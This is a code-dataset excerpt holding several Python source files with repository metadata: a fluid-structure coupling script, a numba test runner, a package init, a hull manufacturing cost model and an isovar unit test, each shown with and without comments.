mesh_solver = mesh_solver.MeshSolver(fluid_model_part,domain_size,reform_dofs_at_each_step)
pDiagPrecond = DiagonalPreconditioner()
mesh_solver.linear_solver = CGSolver(1e-3, 300, pDiagPrecond)
mesh_solver.time_order = 2
mesh_solver.Initialize()
mesh_solver.solver.SetEchoLevel(0);
print "mesh solver created"
structure_solver = structural_solver_dynamic.DynamicStructuralSolver(structure_model_part,domain_size)
structure_solver.Initialize()
structure_model_part.Properties[1].SetValue(CONSTITUTIVE_LAW, Isotropic2D() )
print "structural solver created"
utilities = VariableUtils()
interface_fluid_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,fluid_model_part.Nodes)
interface_structure_nodes = (utilities).SelectNodeList(IS_INTERFACE,1.0,structure_model_part.Nodes)
print "interface fluid nodes = ",len(interface_fluid_nodes)
print "interface structure nodes = ",len(interface_structure_nodes)
mapper = Conformant_OneSideMap.Conformant_OneSideMap(interface_fluid_nodes,interface_structure_nodes)
print "mapper created"
coupled_solver = ExplicitCoupling.ExplicitCoupling(fluid_model_part,structure_model_part,structure_solver,fluid_solver,mesh_solver,mapper,domain_size)
print "coupled solver created"
nsteps = 5000
output_step = 10
Dt = 0.005
out = 0
gid_io.InitializeMesh(0.0)
gid_io.WriteMesh((fluid_model_part).GetMesh());
gid_io.FinalizeMesh()
for step in range(0,nsteps):
time = Dt*step
fluid_model_part.CloneTimeStep(time)
structure_model_part.CloneTimeStep(time)
print "time = " , time
if(step < 5 ):
if(step > 3):
print "solving only the fluid - starting procedure"
fluid_solver.Solve()
print "solution -only fluid- complete"
else:
print "coupled solve"
coupled_solver.Solve()
if(out == output_step):
gid_io.InitializeResults( time, (fluid_model_part).GetMesh() )
gid_io.WriteNodalResults(VELOCITY,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(DISPLACEMENT,fluid_model_part.Nodes,time,0)
gid_io.WriteNodalResults(PRESSURE,fluid_model_part.Nodes,time,0)
        out = 0
    out = out + 1
| false | true |
1c4aa98aa4f83548da28cc3f7672a27cd6f68e46 | 137 | py | Python | buildscripts/condarecipe/run_test.py | meawoppl/numba | bb8df0aee99133c6d52465ae9f9df2a7996339f3 | [
"BSD-2-Clause"
] | null | null | null | buildscripts/condarecipe/run_test.py | meawoppl/numba | bb8df0aee99133c6d52465ae9f9df2a7996339f3 | [
"BSD-2-Clause"
] | null | null | null | buildscripts/condarecipe/run_test.py | meawoppl/numba | bb8df0aee99133c6d52465ae9f9df2a7996339f3 | [
"BSD-2-Clause"
] | null | null | null | import sys
import numba
if not numba.test():
print("Test failed")
sys.exit(1)
print('numba.__version__: %s' % numba.__version__)
| 19.571429 | 50 | 0.693431 | import sys
import numba
if not numba.test():
print("Test failed")
sys.exit(1)
print('numba.__version__: %s' % numba.__version__)
| true | true |
1c4aa9eedb3b1c6e2e7a3e567eb7ad686eaa3237 | 95 | py | Python | src/learndash/api_resources/__init__.py | MarkMacDon/learndash-python | a3fbfc45567a524b80c732d735f2ae101119f2e4 | [
"MIT"
] | null | null | null | src/learndash/api_resources/__init__.py | MarkMacDon/learndash-python | a3fbfc45567a524b80c732d735f2ae101119f2e4 | [
"MIT"
] | 1 | 2021-05-06T19:01:24.000Z | 2021-05-06T19:01:24.000Z | src/learndash/api_resources/__init__.py | MarkMacDon/learndash-python | a3fbfc45567a524b80c732d735f2ae101119f2e4 | [
"MIT"
] | 2 | 2021-05-05T22:45:04.000Z | 2021-07-24T08:47:02.000Z | from learndash.api_resources.course import Course
from learndash.api_resources.user import User | 47.5 | 49 | 0.884211 | from learndash.api_resources.course import Course
from learndash.api_resources.user import User | true | true |
1c4aaa3ecbd03e5bc7c441414b0760d3b67f14f2 | 14,518 | py | Python | analysis_tools/iFAB/psu_python_library/hull_cost_model.py | lefevre-fraser/openmeta-mms | 08f3115e76498df1f8d70641d71f5c52cab4ce5f | [
"MIT"
] | null | null | null | analysis_tools/iFAB/psu_python_library/hull_cost_model.py | lefevre-fraser/openmeta-mms | 08f3115e76498df1f8d70641d71f5c52cab4ce5f | [
"MIT"
] | null | null | null | analysis_tools/iFAB/psu_python_library/hull_cost_model.py | lefevre-fraser/openmeta-mms | 08f3115e76498df1f8d70641d71f5c52cab4ce5f | [
"MIT"
] | null | null | null | """
hull_cost_model.py
Matthew Woodruff ([email protected])
The Pennsylvania State University
Applied Research Laboratory
2013
Compute the cost and lead time for the hull based on physical
description
"""
import copy
import argparse
import math
import json
import StringIO
from collections import namedtuple
class NoHeaderError(Exception):
pass
def associate(table):
"""
Convert a list-of-lists to a dict-of-dicts.
"""
# stage 1: dict of lists
stage1 = dict([[row[0], row[1:]] for row in table])
header = stage1.get("header", None)
if header is None:
msg = "Need a header to make an associative table.\n"\
"First row was {0}".format(table[0])
raise NoHeaderError(msg)
# stage 2: dict of dicts
stage2 = {}
for key in [key for key in stage1.iterkeys() if key != "header"]:
stage2[key] = dict(zip(header, stage1[key]))
return stage2
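# Illustrative example (made-up data, not from the model tables):
#   associate([["header", "cost", "time"], ["blast", 10, 2.5]])
#   -> {"blast": {"cost": 10, "time": 2.5}}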
class CostModelError(Exception):
pass
class HullCostAndTime(object):
"""
the CostModel contains the logic for each kind of hull production
activity
"""
def __init__(self, tables):
"""
tables: dict of tables (each table is a list of lists)
Because of shared setups, the model is stateful and a new
instance should be used for each evaluation.
"""
# check for appropriate keys
expected = ["model", "shared_setups"]
for table in expected: # raise error if missing data
if tables.get(table, None) is None:
msg = "Hull Cost Model requires a table named {0}"
raise CostModelError(msg.format(table))
self.tables = tables # for now
self.model = associate(tables["model"])
self.operations = self.model.keys()
for row in tables["materials"][1:]:
row[0] = tuple(row[0])
self.materials = associate(tables["materials"])
self.material_types = associate(tables["material_type"])
self.opnames = dict(tables["operations"])
self.setups_counted = []
def material_areas(self, plates):
"""
Compute total area for each (material, thickness)
"""
areas = {}
for plate in plates:
key = plate["key"]
material_type = self.material_types[plate["material"]]
area = areas.get(key, 0)
area += plate["area"]
areas[key] = area
return areas
def material_sheets(self, areas):
"""
Compute number of sheets for each material.
We're not solving the cutting stock problem, and we're
not concerned with panels that are too big to cut out
of a single sheet.
Instead, we compute total area for each type of steel, add
ten percent for scrap, then divide by the area of a sheet
to get the total number of sheets needed.
"""
sheets = {}
for key, area in areas.iteritems():
area *= 1.1 # ten percent scrap
sheetlength = self.materials[key]["length"]
sheetwidth = self.materials[key]["width"]
number = area / (sheetlength * sheetwidth)
sheets[key] = math.ceil(number) # round up to full sheet
return sheets
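    # Worked example (illustrative numbers): 40,000 in^2 of one material on
    # 96 in x 48 in sheets -> 40,000 * 1.1 = 44,000 in^2 of demand;
    # 44,000 / (96 * 48) = 9.55 -> ceil -> 10 sheets.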
def nsteelsheets(self, plates):
"""
Total number of steel sheet sides = 2 * number of sheets
(Info needed for blasting.)
"""
areas = self.material_areas(plates)
sheets = self.material_sheets(areas)
nsheets = sum([sheets[key] for key in sheets.iterkeys() if
self.material_types[key[0]]["type"] == "Steel"])
return 2.0 * nsheets
def cuttime(self, plates, technology):
"""
Cutting time is computed the same way for both Plasma
and Laser.
Total cut time depends on thickness, perimeter,
and material of panels.
Assuming you have to cut every edge and you can't use the
edges of the sheets that the plates are cut from.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["cut"] == technology:
perimeter = 2.0 * plate["perimeter"] # 2 sides
speed = material["cutspeed"]
totaltime += perimeter / speed
return totaltime
def plasmacuttime(self, plates):
return self.cuttime(plates, "Plasma")
def lasercuttime(self, plates):
return self.cuttime(plates, "Laser")
def waterjet(self, plates):
return self.cuttime(plates, "Waterjet")
def perimeter(self, plates, kind):
"""
Used to compute edge prep time. Steel and aluminum are
separate.
"""
perimeter = 0
for plate in plates:
if self.material_types[plate["material"]]["type"] == kind:
perimeter += 2.0 * plate["perimeter"] # 2 sides
return perimeter
def steelperimeter(self, plates):
return self.perimeter(plates, "Steel")
def alperimeter(self, plates):
return self.perimeter(plates, "Aluminum")
def npanels(self, plates):
"""
Total number of panels (all plates) is needed for
build and tack operation
"""
return len(plates)
def weldtime(self, plates, technology):
"""
Welding time depends on perimeter of plates.
We're apparently not concerned that we might need to weld
incompatible plates.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["weld"] == technology:
perimeter = 2.0 * plate["perimeter"] # 2 sides
speed = material["weldspeed"]
totaltime += (perimeter / (2.0*speed))
return totaltime
def migtime(self, plates):
return self.weldtime(plates, "MIG")
def tigtime(self, plates):
return self.weldtime(plates, "TIG")
def pwmtime(self, plates):
"""
Return 1 for one post-weld machining
"""
return 1
def hullarea(self, plates):
"""
Hull surface area: needed for painting, includes both sides,
units are square meters.
"""
in2 = 2.0 * sum([plate["area"] for plate in plates])
factor = 0.00064516 # to convert to square meters
return in2 * factor
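    # Unit check: 1 in = 0.0254 m, so 1 in^2 = 0.0254**2 m^2 = 0.00064516 m^2,
    # which is exactly the factor applied above.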
def shipprep(self, plates):
"""
Return 1 for one shipping prep
"""
return 1
def howmuch(self, op, plates):
"""
for given op and plates, how much work needs to be
done? Units vary by operation.
"""
qtys = {
"blast" : self.nsteelsheets,
"plasma" : self.plasmacuttime,
"laser" : self.lasercuttime,
"steelprep" : self.steelperimeter,
"alprep" : self.alperimeter,
"buildntack" : self.npanels,
"mig" : self.migtime,
"tig" : self.tigtime,
"pwm" : self.pwmtime,
"paint" : self.hullarea,
"shipprep" : self.shipprep,
"waterjet" : self.waterjet
}
try:
qty = qtys[op] # KeyError if invalid op
except KeyError:
msg = "{0}: Model has no formula for "\
"work quantity".format(op)
raise CostModelError(msg)
return qty(plates)
def howfast(self, op):
"""
Look up rate in the table. Some rates are 1, meaning that
the quantity of work is already expressed in minutes.
"""
return self.model[op]["workrate"]
def setup(self, op):
"""
Some operations share setups, so if they are both present,
only count one of the setups.
Assume that this method is only called if there is in fact
a setup for the operation.
"""
for group in self.tables["shared_setups"]:
if op in group:
for otherop in group:
if otherop in self.setups_counted:
self.setups_counted.append(op)
return 0
self.setups_counted.append(op)
return self.model[op]["setup"]
def ohqty(self, op, size, laborneeded):
"""
A special exception for painting: overhead is charged by
surface area rather than time.
"""
if op in ["paint"]:
return size
else:
return laborneeded
def prepare_plates(self, plates):
"""
Check that material and dimensional data are present in the
model for all plates
Annotate each plate with its key
Convert units from mm to inches
"""
plates = copy.copy(plates)
counter = 0
for plate in plates:
fields = ["material", "thickness", "area", "perimeter"]
for field in fields:
data = plate.get(field, None)
if data is None:
msg = "No {0} specified for plate {1}"
raise CostModelError(msg.format(field, counter))
material = (plate["material"], plate["thickness"])
plate["key"] = material
material_data = self.materials.get(material, None)
if material_data is None:
msg = "No material data for ({0}, {1}) (plate {2})"
raise CostModelError(
msg.format(material[0], material[1], counter))
# Excel model uses inches
plate["area"] = plate["area"] / 25.4 ** 2 # mm2 to in2
plate["perimeter"] = plate["perimeter"] / 25.4 # mm to in
counter += 1
return plates
def build_cost_and_lead_time(self, plates):
"""
plates: list of summary data about plates
(material, thickness, perimeter, area)
Note that we charge by the hour but work by the minute,
so we convert laborneeded to hours
"""
costs = []
times = []
for op in self.operations:
size = self.howmuch(op, plates)
workrate = self.howfast(op)
if size > 0:
setup = self.setup(op)
else:
setup = 0
laborneeded = (setup + size / workrate) / 60.0
labqty = self.model[op]["labqty"]
labrate = self.model[op]["labrate"]
ohqty = self.ohqty(op, size, laborneeded)
ohrate = self.model[op]["ohrate"]
cost = laborneeded * labqty * labrate \
+ ohqty * ohrate
time = laborneeded
times.append(time)
costs.append(cost)
header = ["operation", "cost", "time"]
operations = [self.opnames[op]
for op in self.operations]
table = [dict(zip(header, record))
for record in zip(operations, costs, times)]
return {"table": table,
"cost": sum(costs), "time": sum(times)}
def material_cost_and_lead_time(self, plates):
cost = 0
time = 0
sheets = self.material_sheets(self.material_areas(plates))
for key in sheets.iterkeys():
matl = self.materials[key]
thickness = key[1]
volume = thickness * matl["length"] * matl["width"]
volume *= sheets[key]
mass = volume * self.material_types[key[0]]["density"]
matlcost = mass * matl["cost"]
cost += matlcost
time = max(time, matl["leadtime"])
return (cost, time)
def mass(plates, materials):
""" compute mass of each plate based on material data """
totalmass = 0
matl_data = dict([(row[0], row[1:]) for row in materials])
for plate in plates:
matl = plate.get("material", "MIL_DTL_12560")
this_matl_data = matl_data.get(matl, [-1, "x", "x", 0.0])
density = this_matl_data[-1] # per cubic inch
thickness = plate.get("thickness", 1.5)
area = plate.get("area", 0)
volume = thickness * area
plate["mass"] = volume * density
totalmass += plate["mass"]
return totalmass
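# Note: the densities in the material_type table appear to be in pounds per
# cubic inch (plate dimensions are in inches), so totalmass is in pounds;
# evaluate() below converts the total to kg with the 0.453592 factor.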
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("hullplates", type=argparse.FileType("r"),
help="json list of plates in the hull")
parser.add_argument("-d", "--model-data",
type=argparse.FileType("r"),
default="hull_cost_data.json",
help="json cost model data")
return parser.parse_args()
def evaluate(plates, tables):
model = HullCostAndTime(tables)
plates = model.prepare_plates(plates)
build = model.build_cost_and_lead_time(plates)
material = model.material_cost_and_lead_time(plates)
matl_cost = material[0]
matl_time = material[1] * 7 # convert weeks to days
build_cost = build["cost"]
build_time = build["time"] / 8.0 # convert hours to days
total_mass = mass(plates, tables["material_type"])
report = {}
report["plates"] = plates
report["Build"] = build["table"]
report["Build Cost"] = build_cost
report["Build Time"] = build_time
report["Material Cost"] = matl_cost
report["Material Lead Time"] = matl_time
report["Total Cost"] = build_cost + matl_cost
report["Total Time"] = build_time + matl_time
report["Total Mass"] = total_mass * 0.453592 # convert to kg
return report
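# Minimal usage sketch (the plates file name is an assumption; the tables file
# mirrors the get_args default):
#   plates = json.load(open("my_hull_plates.json"))
#   tables = json.load(open("hull_cost_data.json"))
#   report = evaluate(plates, tables)
#   print report["Total Cost"], report["Total Time"]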
if __name__ == "__main__":
args = get_args()
plates = json.load(args.hullplates)
tables = json.load(args.model_data)
    report = evaluate(plates, tables)
print report
# vim:ts=4:sw=4:expandtab:fdm=indent:wrap lbr:ai:colorcolumn=70
| 35.670762 | 72 | 0.544496 | """
hull_cost_model.py
Matthew Woodruff ([email protected])
The Pennsylvania State University
Applied Research Laboratory
2013
Compute the cost and lead time for the hull based on physical
description
"""
import copy
import argparse
import math
import json
import StringIO
from collections import namedtuple
class NoHeaderError(Exception):
pass
def associate(table):
"""
Convert a list-of-lists to a dict-of-dicts.
"""
stage1 = dict([[row[0], row[1:]] for row in table])
header = stage1.get("header", None)
if header is None:
msg = "Need a header to make an associative table.\n"\
"First row was {0}".format(table[0])
raise NoHeaderError(msg)
stage2 = {}
for key in [key for key in stage1.iterkeys() if key != "header"]:
stage2[key] = dict(zip(header, stage1[key]))
return stage2
class CostModelError(Exception):
pass
class HullCostAndTime(object):
"""
the CostModel contains the logic for each kind of hull production
activity
"""
def __init__(self, tables):
"""
tables: dict of tables (each table is a list of lists)
Because of shared setups, the model is stateful and a new
instance should be used for each evaluation.
"""
expected = ["model", "shared_setups"]
        for table in expected:
            if tables.get(table, None) is None:
msg = "Hull Cost Model requires a table named {0}"
raise CostModelError(msg.format(table))
        self.tables = tables
        self.model = associate(tables["model"])
self.operations = self.model.keys()
for row in tables["materials"][1:]:
row[0] = tuple(row[0])
self.materials = associate(tables["materials"])
self.material_types = associate(tables["material_type"])
self.opnames = dict(tables["operations"])
self.setups_counted = []
def material_areas(self, plates):
"""
Compute total area for each (material, thickness)
"""
areas = {}
for plate in plates:
key = plate["key"]
material_type = self.material_types[plate["material"]]
area = areas.get(key, 0)
area += plate["area"]
areas[key] = area
return areas
def material_sheets(self, areas):
"""
Compute number of sheets for each material.
We're not solving the cutting stock problem, and we're
not concerned with panels that are too big to cut out
of a single sheet.
Instead, we compute total area for each type of steel, add
ten percent for scrap, then divide by the area of a sheet
to get the total number of sheets needed.
"""
sheets = {}
for key, area in areas.iteritems():
            area *= 1.1
            sheetlength = self.materials[key]["length"]
sheetwidth = self.materials[key]["width"]
number = area / (sheetlength * sheetwidth)
            sheets[key] = math.ceil(number)
        return sheets
def nsteelsheets(self, plates):
"""
Total number of steel sheet sides = 2 * number of sheets
(Info needed for blasting.)
"""
areas = self.material_areas(plates)
sheets = self.material_sheets(areas)
nsheets = sum([sheets[key] for key in sheets.iterkeys() if
self.material_types[key[0]]["type"] == "Steel"])
return 2.0 * nsheets
def cuttime(self, plates, technology):
"""
Cutting time is computed the same way for both Plasma
and Laser.
Total cut time depends on thickness, perimeter,
and material of panels.
Assuming you have to cut every edge and you can't use the
edges of the sheets that the plates are cut from.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["cut"] == technology:
perimeter = 2.0 * plate["perimeter"] # 2 sides
speed = material["cutspeed"]
totaltime += perimeter / speed
return totaltime
def plasmacuttime(self, plates):
return self.cuttime(plates, "Plasma")
def lasercuttime(self, plates):
return self.cuttime(plates, "Laser")
def waterjet(self, plates):
return self.cuttime(plates, "Waterjet")
def perimeter(self, plates, kind):
"""
Used to compute edge prep time. Steel and aluminum are
separate.
"""
perimeter = 0
for plate in plates:
if self.material_types[plate["material"]]["type"] == kind:
perimeter += 2.0 * plate["perimeter"] # 2 sides
return perimeter
def steelperimeter(self, plates):
return self.perimeter(plates, "Steel")
def alperimeter(self, plates):
return self.perimeter(plates, "Aluminum")
def npanels(self, plates):
"""
Total number of panels (all plates) is needed for
build and tack operation
"""
return len(plates)
def weldtime(self, plates, technology):
"""
Welding time depends on perimeter of plates.
We're apparently not concerned that we might need to weld
incompatible plates.
"""
totaltime = 0
for plate in plates:
key = plate["key"]
material = self.materials[key]
if material["weld"] == technology:
perimeter = 2.0 * plate["perimeter"] speed = material["weldspeed"]
totaltime += (perimeter / (2.0*speed))
return totaltime
def migtime(self, plates):
return self.weldtime(plates, "MIG")
def tigtime(self, plates):
return self.weldtime(plates, "TIG")
def pwmtime(self, plates):
"""
Return 1 for one post-weld machining
"""
return 1
def hullarea(self, plates):
"""
Hull surface area: needed for painting, includes both sides,
units are square meters.
"""
in2 = 2.0 * sum([plate["area"] for plate in plates])
        factor = 0.00064516
        return in2 * factor
def shipprep(self, plates):
"""
Return 1 for one shipping prep
"""
return 1
def howmuch(self, op, plates):
"""
for given op and plates, how much work needs to be
done? Units vary by operation.
"""
qtys = {
"blast" : self.nsteelsheets,
"plasma" : self.plasmacuttime,
"laser" : self.lasercuttime,
"steelprep" : self.steelperimeter,
"alprep" : self.alperimeter,
"buildntack" : self.npanels,
"mig" : self.migtime,
"tig" : self.tigtime,
"pwm" : self.pwmtime,
"paint" : self.hullarea,
"shipprep" : self.shipprep,
"waterjet" : self.waterjet
}
try:
            qty = qtys[op]
        except KeyError:
msg = "{0}: Model has no formula for "\
"work quantity".format(op)
raise CostModelError(msg)
return qty(plates)
def howfast(self, op):
"""
Look up rate in the table. Some rates are 1, meaning that
the quantity of work is already expressed in minutes.
"""
return self.model[op]["workrate"]
def setup(self, op):
"""
Some operations share setups, so if they are both present,
only count one of the setups.
Assume that this method is only called if there is in fact
a setup for the operation.
"""
for group in self.tables["shared_setups"]:
if op in group:
for otherop in group:
if otherop in self.setups_counted:
self.setups_counted.append(op)
return 0
self.setups_counted.append(op)
return self.model[op]["setup"]
def ohqty(self, op, size, laborneeded):
"""
A special exception for painting: overhead is charged by
surface area rather than time.
"""
if op in ["paint"]:
return size
else:
return laborneeded
def prepare_plates(self, plates):
"""
Check that material and dimensional data are present in the
model for all plates
Annotate each plate with its key
Convert units from mm to inches
"""
plates = copy.copy(plates)
counter = 0
for plate in plates:
fields = ["material", "thickness", "area", "perimeter"]
for field in fields:
data = plate.get(field, None)
if data is None:
msg = "No {0} specified for plate {1}"
raise CostModelError(msg.format(field, counter))
material = (plate["material"], plate["thickness"])
plate["key"] = material
material_data = self.materials.get(material, None)
if material_data is None:
msg = "No material data for ({0}, {1}) (plate {2})"
raise CostModelError(
msg.format(material[0], material[1], counter))
plate["area"] = plate["area"] / 25.4 ** 2 plate["perimeter"] = plate["perimeter"] / 25.4 counter += 1
return plates
def build_cost_and_lead_time(self, plates):
"""
plates: list of summary data about plates
(material, thickness, perimeter, area)
Note that we charge by the hour but work by the minute,
so we convert laborneeded to hours
"""
costs = []
times = []
for op in self.operations:
size = self.howmuch(op, plates)
workrate = self.howfast(op)
if size > 0:
setup = self.setup(op)
else:
setup = 0
laborneeded = (setup + size / workrate) / 60.0
labqty = self.model[op]["labqty"]
labrate = self.model[op]["labrate"]
ohqty = self.ohqty(op, size, laborneeded)
ohrate = self.model[op]["ohrate"]
cost = laborneeded * labqty * labrate \
+ ohqty * ohrate
time = laborneeded
times.append(time)
costs.append(cost)
header = ["operation", "cost", "time"]
operations = [self.opnames[op]
for op in self.operations]
table = [dict(zip(header, record))
for record in zip(operations, costs, times)]
return {"table": table,
"cost": sum(costs), "time": sum(times)}
def material_cost_and_lead_time(self, plates):
cost = 0
time = 0
sheets = self.material_sheets(self.material_areas(plates))
for key in sheets.iterkeys():
matl = self.materials[key]
thickness = key[1]
volume = thickness * matl["length"] * matl["width"]
volume *= sheets[key]
mass = volume * self.material_types[key[0]]["density"]
matlcost = mass * matl["cost"]
cost += matlcost
time = max(time, matl["leadtime"])
return (cost, time)
def mass(plates, materials):
""" compute mass of each plate based on material data """
totalmass = 0
matl_data = dict([(row[0], row[1:]) for row in materials])
for plate in plates:
matl = plate.get("material", "MIL_DTL_12560")
this_matl_data = matl_data.get(matl, [-1, "x", "x", 0.0])
density = this_matl_data[-1]
thickness = plate.get("thickness", 1.5)
area = plate.get("area", 0)
volume = thickness * area
plate["mass"] = volume * density
totalmass += plate["mass"]
return totalmass
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("hullplates", type=argparse.FileType("r"),
help="json list of plates in the hull")
parser.add_argument("-d", "--model-data",
type=argparse.FileType("r"),
default="hull_cost_data.json",
help="json cost model data")
return parser.parse_args()
def evaluate(plates, tables):
model = HullCostAndTime(tables)
plates = model.prepare_plates(plates)
build = model.build_cost_and_lead_time(plates)
material = model.material_cost_and_lead_time(plates)
matl_cost = material[0]
    matl_time = material[1] * 7
    build_cost = build["cost"]
    build_time = build["time"] / 8.0
    total_mass = mass(plates, tables["material_type"])
report = {}
report["plates"] = plates
report["Build"] = build["table"]
report["Build Cost"] = build_cost
report["Build Time"] = build_time
report["Material Cost"] = matl_cost
report["Material Lead Time"] = matl_time
report["Total Cost"] = build_cost + matl_cost
report["Total Time"] = build_time + matl_time
report["Total Mass"] = total_mass * 0.453592
return report
if __name__ == "__main__":
args = get_args()
plates = json.load(args.hullplates)
tables = json.load(args.model_data)
    report = evaluate(plates, tables)
print report
| false | true |
1c4aab8843fa67ec04a2e6b2e8f6b2aacade81f0 | 1,013 | py | Python | test/test_allele_reads.py | carnivorouspeanut/isovar_comp | 74fcc12ef52d08eb4cfa85bdcda8903970babbda | [
"Apache-2.0"
] | null | null | null | test/test_allele_reads.py | carnivorouspeanut/isovar_comp | 74fcc12ef52d08eb4cfa85bdcda8903970babbda | [
"Apache-2.0"
] | null | null | null | test/test_allele_reads.py | carnivorouspeanut/isovar_comp | 74fcc12ef52d08eb4cfa85bdcda8903970babbda | [
"Apache-2.0"
] | null | null | null |
from isovar.allele_reads import AlleleRead
from isovar.locus_reads import LocusRead
from nose.tools import eq_
def make_read_at_locus(prefix, alt, suffix, base_quality=30, name="dummy"):
dummy_sequence = prefix + alt + suffix
return LocusRead(
name="dummy",
sequence=dummy_sequence,
reference_positions=list(range(1, len(dummy_sequence) + 1)),
quality_scores=[base_quality] * len(dummy_sequence),
base0_read_position_before_variant=len(prefix) - 1,
base0_read_position_after_variant=len(prefix) + len(alt),
)
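# For the call in the test below, prefix="NCCN", alt="A", suffix="TNNA" gives
# sequence "NCCNATNNA", base0_read_position_before_variant = 3 (last prefix base)
# and base0_read_position_after_variant = 5 (first suffix base).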
def test_allele_read_from_single_read_at_locus_trim_N_nucleotides():
read_at_locus = make_read_at_locus(prefix="NCCN", alt="A", suffix="TNNA")
allele_read = AlleleRead.from_locus_read(read_at_locus, n_ref=1)
print(allele_read)
expected = AlleleRead(prefix="", allele="A", suffix="T", name="dummy")
eq_(allele_read, expected)
if __name__ == "__main__":
test_allele_read_from_single_read_at_locus_trim_N_nucleotides()
| 38.961538 | 77 | 0.740375 |
from isovar.allele_reads import AlleleRead
from isovar.locus_reads import LocusRead
from nose.tools import eq_
def make_read_at_locus(prefix, alt, suffix, base_quality=30, name="dummy"):
dummy_sequence = prefix + alt + suffix
return LocusRead(
name="dummy",
sequence=dummy_sequence,
reference_positions=list(range(1, len(dummy_sequence) + 1)),
quality_scores=[base_quality] * len(dummy_sequence),
base0_read_position_before_variant=len(prefix) - 1,
base0_read_position_after_variant=len(prefix) + len(alt),
)
def test_allele_read_from_single_read_at_locus_trim_N_nucleotides():
read_at_locus = make_read_at_locus(prefix="NCCN", alt="A", suffix="TNNA")
allele_read = AlleleRead.from_locus_read(read_at_locus, n_ref=1)
print(allele_read)
expected = AlleleRead(prefix="", allele="A", suffix="T", name="dummy")
eq_(allele_read, expected)
if __name__ == "__main__":
test_allele_read_from_single_read_at_locus_trim_N_nucleotides()
| true | true |